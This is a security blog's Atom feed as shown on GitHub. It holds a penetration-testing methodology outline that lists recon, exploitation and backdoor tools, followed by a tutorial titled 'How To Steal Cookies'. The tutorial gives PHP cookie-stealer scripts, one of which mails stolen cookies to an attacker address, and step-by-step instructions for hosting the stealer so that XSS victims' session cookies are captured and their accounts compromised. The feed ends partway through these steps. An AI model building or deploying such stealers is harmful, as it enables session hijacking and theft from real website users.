tdyhacker.github.io/atom.xml at master · tdyhacker/tdyhacker.github.io · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>    tudouya&#39;s secblog</title>
  <subtitle>~The quieter you become,the more you can hear~</subtitle>
  <link href="/atom.xml" rel="self"/>

  <link href="http://sec.php101.cn/"/>
  <updated>2016-10-02T19:39:20.000Z</updated>
  <id>http://sec.php101.cn/</id>

  <author>
    <name>tudouya</name>

  </author>

  <generator uri="http://hexo.io/">Hexo</generator>

  <entry>
    <title>The Main Points of Penetration Testing Methodology</title>
    <link href="http://sec.php101.cn/2015/11/13/The-Main-Points-of-Penetration-Testing-Methodology/"/>
    <id>http://sec.php101.cn/2015/11/13/The-Main-Points-of-Penetration-Testing-Methodology/</id>
    <published>2015-11-12T17:26:48.000Z</published>
    <updated>2016-10-02T19:39:20.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Information-Gathering&quot;&gt;&lt;a href=&quot;#Information-Gathering&quot; class=&quot;headerlink&quot; title=&quot;Information Gathering&quot;&gt;&lt;/a&gt;Information Gathering&lt;/h2&gt;&lt;p&gt;This step occurs before you even get into their network. The goal is to gather as much information as possible about the business, their websites, personnel, and anything else that may be relevant. People often use insecure passwords such as l33tsp34k versions of their company’s name, names of their children, years of birth or graduation, and so on. Discovering this data about as many users as possible can be incredibly beneficial if you are attempting to crack passwords.  &lt;/p&gt;
&lt;h3 id=&quot;Tools&quot;&gt;&lt;a href=&quot;#Tools&quot; class=&quot;headerlink&quot; title=&quot;Tools&quot;&gt;&lt;/a&gt;Tools&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;Facebook/Twitter/LinkedIn/Google+&lt;/li&gt;
&lt;li&gt;Maltego&lt;/li&gt;
&lt;li&gt;Creepy&lt;/li&gt;
&lt;li&gt;Social Engineering (Who do I talk to, to apply for an IT job?)&lt;/li&gt;
&lt;li&gt;Recon-ng&lt;/li&gt;
&lt;li&gt;TheHarvester&lt;/li&gt;
&lt;li&gt;Metagoofil&lt;/li&gt;
&lt;li&gt;Shodan + Shodan’s API&lt;/li&gt;
&lt;li&gt;DNSenum/DNSrecon&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;Network-Discovery&quot;&gt;&lt;a href=&quot;#Network-Discovery&quot; class=&quot;headerlink&quot; title=&quot;Network Discovery&quot;&gt;&lt;/a&gt;Network Discovery&lt;/h2&gt;&lt;p&gt;Here, I scan the network and map out every possible device, system, domain controller, host, and piece of equipment that I can. This is also where I start Wireshark or TCPDump to capture data and get a better visual as to see what’s going on in the network. In switched networks, you can only passively detect broadcasts from other machines, and not communication between two other machines specifically. However, if you are there as a security engineer, you may want to create a SPAN port on the switch so you can mirror the communication between other ports.  &lt;/p&gt;
&lt;h3 id=&quot;Tools-1&quot;&gt;&lt;a href=&quot;#Tools-1&quot; class=&quot;headerlink&quot; title=&quot;Tools&quot;&gt;&lt;/a&gt;Tools&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;NMap&lt;/li&gt;
&lt;li&gt;Unicorn Scan&lt;/li&gt;
&lt;li&gt;Maltego&lt;/li&gt;
&lt;li&gt;NetDiscover&lt;/li&gt;
&lt;li&gt;SMBClient&lt;/li&gt;
&lt;li&gt;Ettercap&lt;/li&gt;
&lt;li&gt;Wirehark&lt;/li&gt;
&lt;li&gt;TCPDump&lt;/li&gt;
&lt;li&gt;Arping&lt;/li&gt;
&lt;li&gt;Hping3&lt;/li&gt;
&lt;li&gt;Xprobe2&lt;/li&gt;
&lt;li&gt;TCPflow&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;Enumeration&quot;&gt;&lt;a href=&quot;#Enumeration&quot; class=&quot;headerlink&quot; title=&quot;Enumeration&quot;&gt;&lt;/a&gt;Enumeration&lt;/h2&gt;&lt;p&gt;Here is where I perform port mapping, service and version checks, OS detection, service scans, domain enumeration, user enumeration locally, and any amount of information that I can get. The goal is to find out which machines can be logged onto, what they are serving, what versions the services are, what authentication protocols are being used, and so on.  &lt;/p&gt;
&lt;h3 id=&quot;Tools-2&quot;&gt;&lt;a href=&quot;#Tools-2&quot; class=&quot;headerlink&quot; title=&quot;Tools&quot;&gt;&lt;/a&gt;Tools&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;NMap&lt;/li&gt;
&lt;li&gt;NSE (Nmap Scripting Engine)&lt;/li&gt;
&lt;li&gt;Maltego&lt;/li&gt;
&lt;li&gt;SCAPY&lt;/li&gt;
&lt;li&gt;NBTscan (NetBios shit)&lt;/li&gt;
&lt;li&gt;Cisco Analysis Tools&lt;/li&gt;
&lt;li&gt;Wireshark&lt;/li&gt;
&lt;li&gt;DNSEnum&lt;/li&gt;
&lt;li&gt;smtp-user-enum&lt;/li&gt;
&lt;li&gt;snmpwalk&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;Vulnerability-Assessment&quot;&gt;&lt;a href=&quot;#Vulnerability-Assessment&quot; class=&quot;headerlink&quot; title=&quot;Vulnerability Assessment&quot;&gt;&lt;/a&gt;Vulnerability Assessment&lt;/h2&gt;&lt;p&gt;From looking at the services, devices software, and information we discovered in the enumeration part of the assessment, we get a better understanding of the how the network functions as a whole. We can more easily scan or search for known vulnerabilities, or attempt to write your own.  &lt;/p&gt;
&lt;h3 id=&quot;Tools-3&quot;&gt;&lt;a href=&quot;#Tools-3&quot; class=&quot;headerlink&quot; title=&quot;Tools&quot;&gt;&lt;/a&gt;Tools&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;NMap&lt;/li&gt;
&lt;li&gt;NSE (Nmap Scripting Engine)&lt;/li&gt;
&lt;li&gt;Metasploit/Armitage + Nexpose&lt;/li&gt;
&lt;li&gt;Nessus&lt;/li&gt;
&lt;li&gt;OpenVAS&lt;/li&gt;
&lt;li&gt;Powerfuzzer&lt;/li&gt;
&lt;li&gt;Custom Fuzzers&lt;/li&gt;
&lt;li&gt;Cisco Analysis Tools (Nipper is a great one)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;Exploitation-and-Security&quot;&gt;&lt;a href=&quot;#Exploitation-and-Security&quot; class=&quot;headerlink&quot; title=&quot;Exploitation and Security&quot;&gt;&lt;/a&gt;Exploitation and Security&lt;/h2&gt;&lt;p&gt;Here I confirm that the systems are vulnerable to attacks and exploits that I’ve found during my scanning and vulnerability assessment. This is where I suggest security updates, software/hardware updates, and add security configurations for routers, switches, and firewalls.  &lt;/p&gt;
&lt;h3 id=&quot;Tools-4&quot;&gt;&lt;a href=&quot;#Tools-4&quot; class=&quot;headerlink&quot; title=&quot;Tools&quot;&gt;&lt;/a&gt;Tools&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;NSE (Nmap Scripting Engine)&lt;/li&gt;
&lt;li&gt;Metasploit/Armitage + Nexpose&lt;/li&gt;
&lt;li&gt;Wireshark + SCAPY (I’ve actually attacked routing protocols with this)&lt;/li&gt;
&lt;li&gt;Various Servers (Bind9 DNS servers, DHCP servers, SMB Servers, Radius servers, etc…)&lt;/li&gt;
&lt;li&gt;Yersina&lt;/li&gt;
&lt;li&gt;Hexinject&lt;/li&gt;
&lt;li&gt;Tcpreplay&lt;/li&gt;
&lt;li&gt;Pineapple (For wireless Pentests&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;Post-Exploitation&quot;&gt;&lt;a href=&quot;#Post-Exploitation&quot; class=&quot;headerlink&quot; title=&quot;Post Exploitation&quot;&gt;&lt;/a&gt;Post Exploitation&lt;/h2&gt;&lt;p&gt;Here is where I install some sort of backdoor that I can access in case the host disconnects or the connection is lost.  &lt;/p&gt;
&lt;h3 id=&quot;Tools-5&quot;&gt;&lt;a href=&quot;#Tools-5&quot; class=&quot;headerlink&quot; title=&quot;Tools&quot;&gt;&lt;/a&gt;Tools&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;Stunnel&lt;/li&gt;
&lt;li&gt;SBD (Secure Back Door) ~ Linux&lt;/li&gt;
&lt;li&gt;Cryptcat&lt;/li&gt;
&lt;li&gt;Meterpreter Persistence&lt;/li&gt;
&lt;li&gt;Powersploit&lt;/li&gt;
&lt;li&gt;Iodine&lt;/li&gt;
&lt;li&gt;UDPTunnel&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;h2 id=&quot;Reference&quot;&gt;&lt;a href=&quot;#Reference&quot; class=&quot;headerlink&quot; title=&quot;Reference&quot;&gt;&lt;/a&gt;Reference&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://hackforums.net/showthread.php?tid=3877383&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;Passive Information Gathering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://hackforums.net/showthread.php?tid=3897925&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;Simple Pentest Overview ~ Start to Finish + Post Exploitation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Information-Gathering&quot;&gt;&lt;a href=&quot;#Information-Gathering&quot; class=&quot;headerlink&quot; title=&quot;Information Gathering&quot;&gt;&lt;/a&gt;Information Gathering&lt;/

    </summary>

      <category term="H-AttackFlow" scheme="http://sec.php101.cn/categories/H-AttackFlow/"/>


  </entry>

  <entry>
    <title>How To Steal Cookies</title>
    <link href="http://sec.php101.cn/2015/11/09/How-To-Steal-Cookies/"/>
    <id>http://sec.php101.cn/2015/11/09/How-To-Steal-Cookies/</id>
    <published>2015-11-09T15:17:19.000Z</published>
    <updated>2016-03-17T08:46:36.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Basic-Knowledge-about-Cookies&quot;&gt;&lt;a href=&quot;#Basic-Knowledge-about-Cookies&quot; class=&quot;headerlink&quot; title=&quot;Basic Knowledge about Cookies&quot;&gt;&lt;/a&gt;Basic Knowledge about Cookies&lt;/h2&gt;&lt;p&gt;Different Types of Cookies:&lt;/p&gt;
&lt;h3 id=&quot;Session-cookie&quot;&gt;&lt;a href=&quot;#Session-cookie&quot; class=&quot;headerlink&quot; title=&quot;Session cookie&quot;&gt;&lt;/a&gt;Session cookie&lt;/h3&gt;&lt;p&gt;A session cookie upto certain hours,depending on website. After the session hour, it will be destroyed.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Persistent-Cookie&quot;&gt;&lt;a href=&quot;#Persistent-Cookie&quot; class=&quot;headerlink&quot; title=&quot;Persistent Cookie&quot;&gt;&lt;/a&gt;Persistent Cookie&lt;/h3&gt;&lt;p&gt;A persistent cookie will outlast user sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visited the server. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called &lt;strong&gt;tracking&lt;/strong&gt; cookies or &lt;strong&gt;in-memory&lt;/strong&gt; cookies.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Secure-cookie&quot;&gt;&lt;a href=&quot;#Secure-cookie&quot; class=&quot;headerlink&quot; title=&quot;Secure cookie&quot;&gt;&lt;/a&gt;Secure cookie&lt;/h3&gt;&lt;p&gt;Secure cookies are encrypted cookies. If you used HTTPS(secure Connection), then it will store the cookies in encrypted format. Even hackers steal the cookie, he is able to see only the encrypted data.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;HttpOnly-cookie&quot;&gt;&lt;a href=&quot;#HttpOnly-cookie&quot; class=&quot;headerlink&quot; title=&quot;HttpOnly cookie&quot;&gt;&lt;/a&gt;HttpOnly cookie&lt;/h3&gt;&lt;p&gt;The HttpOnly cookie is supported by most modern browsers. On a supported browser, an HttpOnly session cookie will be used only when transmitting HTTP (or HTTPS) requests, thus restricting access from other, non-HTTP APIs (such as JavaScript). &lt;strong&gt;This restriction mitigates but does not eliminate the threat of session cookie theft via Cross-site scripting.&lt;/strong&gt; It is important to realize this feature applies only to session-management cookies, and not other browser cookies.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Third-party-cookie&quot;&gt;&lt;a href=&quot;#Third-party-cookie&quot; class=&quot;headerlink&quot; title=&quot;Third-party cookie&quot;&gt;&lt;/a&gt;Third-party cookie&lt;/h3&gt;&lt;p&gt;Third-party cookies will store the cookies with another domain.  &lt;/p&gt;
&lt;p&gt;For Example:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.example.com will store the cookies with ad.advertise12.com&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;At the same time, another website also set cookies with same domain.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.othersite.com will store the cookies with ad.advertise12.com&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Supercookie&quot;&gt;&lt;a href=&quot;#Supercookie&quot; class=&quot;headerlink&quot; title=&quot;Supercookie&quot;&gt;&lt;/a&gt;Supercookie&lt;/h3&gt;&lt;p&gt;A “supercookie” is a cookie with a public suffix domain, like .com, .co.in,.in.&lt;br&gt;Most browsers, by default, allow first-party cookies—a cookie with domain to be the same or sub-domain of the requesting host. For example, a user visiting &lt;a href=&quot;http://www.example.com&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.example.com&lt;/a&gt; can have a cookie set with domain &lt;a href=&quot;http://www.example.com&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.example.com&lt;/a&gt; or .example.com, but not .com. A supercookie with domain .com would be blocked by browsers; otherwise, a malicious website, like attacker.com, could set a supercookie with domain .com and potentially disrupt or impersonate legitimate user requests to example.com.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Zombie-cookie&quot;&gt;&lt;a href=&quot;#Zombie-cookie&quot; class=&quot;headerlink&quot; title=&quot;Zombie cookie&quot;&gt;&lt;/a&gt;Zombie cookie&lt;/h3&gt;&lt;p&gt;A zombie cookie is any cookie that is automatically recreated after a user has deleted it. This is accomplished by a script storing the content of the cookie in some other locations, such as the local storage available to Flash content, HTML5 storages and other client side mechanisms, and then recreating the cookie from backup stores when the cookie’s absence is detected.  &lt;/p&gt;
&lt;h2 id=&quot;What-is-the-use-of-Cookies&quot;&gt;&lt;a href=&quot;#What-is-the-use-of-Cookies&quot; class=&quot;headerlink&quot; title=&quot;What is the use of Cookies?&quot;&gt;&lt;/a&gt;What is the use of Cookies?&lt;/h2&gt;&lt;h3 id=&quot;Session-management&quot;&gt;&lt;a href=&quot;#Session-management&quot; class=&quot;headerlink&quot; title=&quot;Session management&quot;&gt;&lt;/a&gt;Session management&lt;/h3&gt;&lt;p&gt;Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a “shopping cart” (or “shopping basket”), a virtual device into which users can store items they want to purchase as they navigate throughout the site.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Personalization&quot;&gt;&lt;a href=&quot;#Personalization&quot; class=&quot;headerlink&quot; title=&quot;Personalization&quot;&gt;&lt;/a&gt;Personalization&lt;/h3&gt;&lt;p&gt;Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Tracking&quot;&gt;&lt;a href=&quot;#Tracking&quot; class=&quot;headerlink&quot; title=&quot;Tracking&quot;&gt;&lt;/a&gt;Tracking&lt;/h3&gt;&lt;p&gt;Tracking cookies may be used to track internet users’ web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision&lt;/p&gt;
&lt;h2 id=&quot;How-to-create-cookie-stealer-Coding-in-PHP&quot;&gt;&lt;a href=&quot;#How-to-create-cookie-stealer-Coding-in-PHP&quot; class=&quot;headerlink&quot; title=&quot;How to create cookie stealer Coding in PHP&quot;&gt;&lt;/a&gt;How to create cookie stealer Coding in PHP&lt;/h2&gt;&lt;p&gt;Here is the simple Cookie Stealer code:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;$cookie = $HTTP_GET_VARS[&amp;quot;cookie&amp;quot;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;$steal = fopen(&amp;quot;cookiefile.txt&amp;quot;, &amp;quot;a&amp;quot;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;fwrite($steal, $cookie .&amp;quot;\\n&amp;quot;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;fclose($steal);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another version: Sends cookies to the hacker mail&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;$cookie = $HTTP_GET_VARS[&amp;quot;cookie&amp;quot;]; mail(&amp;quot;hackerid@mailprovider.com&amp;quot;, &amp;quot;Stolen Cookies&amp;quot;, $cookie);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Third Version&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;if (getenv(&amp;quot;HTTP_CLIENT_IP&amp;quot;) &amp;amp;&amp;amp; strcasecmp(getenv(&amp;quot;HTTP_CLIENT_IP&amp;quot;), &amp;quot;unknown&amp;quot;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  $ip = getenv(&amp;quot;HTTP_CLIENT_IP&amp;quot;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    else if (getenv(&amp;quot;HTTP_X_FORWARDED_FOR&amp;quot;) &amp;amp;&amp;amp; strcasecmp(getenv(&amp;quot;HTTP_X_FORWARDED_FOR&amp;quot;), &amp;quot;unknown&amp;quot;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  $ip = getenv(&amp;quot;HTTP_X_FORWARDED_FOR&amp;quot;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    else if (getenv(&amp;quot;REMOTE_ADDR&amp;quot;) &amp;amp;&amp;amp; strcasecmp(getenv(&amp;quot;REMOTE_ADDR&amp;quot;), &amp;quot;unknown&amp;quot;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  $ip = getenv(&amp;quot;REMOTE_ADDR&amp;quot;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    else if (isset($_SERVER[&amp;apos;REMOTE_ADDR&amp;apos;]) &amp;amp;&amp;amp; $_SERVER[&amp;apos;REMOTE_ADDR&amp;apos;] &amp;amp;&amp;amp; strcasecmp($_SERVER[&amp;apos;REMOTE_ADDR&amp;apos;], &amp;quot;unknown&amp;quot;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  $ip = $_SERVER[&amp;apos;REMOTE_ADDR&amp;apos;];&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Cookie-Stealing&quot;&gt;&lt;a href=&quot;#Cookie-Stealing&quot; class=&quot;headerlink&quot; title=&quot;Cookie Stealing&quot;&gt;&lt;/a&gt;Cookie Stealing&lt;/h2&gt;&lt;p&gt;Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.&lt;/p&gt;
&lt;h3 id=&quot;Step-1-Creating-Cookie-Stealer-PHP-file&quot;&gt;&lt;a href=&quot;#Step-1-Creating-Cookie-Stealer-PHP-file&quot; class=&quot;headerlink&quot; title=&quot;Step 1: Creating Cookie Stealer PHP file&quot;&gt;&lt;/a&gt;Step 1: Creating Cookie Stealer PHP file&lt;/h3&gt;&lt;p&gt;I have explained three versions of cookie stealer. We are going to use the third version.&lt;br&gt;Copy the code.&lt;br&gt;Open Notepad and paste the code&lt;br&gt;Save the file with .php extension&lt;br&gt;Eg: Stealer.php  &lt;/p&gt;
&lt;p&gt;Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.&lt;/p&gt;
&lt;p&gt;Now you will have two files;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;ol&gt;
&lt;li&gt;Stealer.php&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;ol&gt;
&lt;li&gt;log.txt&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What these two files do exactly?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The above Stealer.php file get ip address,cookie and stores the data in log.txt file.&lt;/li&gt;
&lt;li&gt;The log.txt has cookies , ip address details.&lt;br&gt;&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;Step-2&quot;&gt;&lt;a href=&quot;#Step-2&quot; class=&quot;headerlink&quot; title=&quot;Step 2&quot;&gt;&lt;/a&gt;Step 2&lt;/h3&gt;&lt;p&gt;Register in a free web-hosting service and login into your cpanel.&lt;br&gt;Now open the File Manager in cpanel.&lt;br&gt;Upload the Stealer.php and log.txt to root folder or public_html folder.  &lt;/p&gt;
&lt;p&gt;Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .&lt;br&gt;&lt;br&gt;&lt;/p&gt;
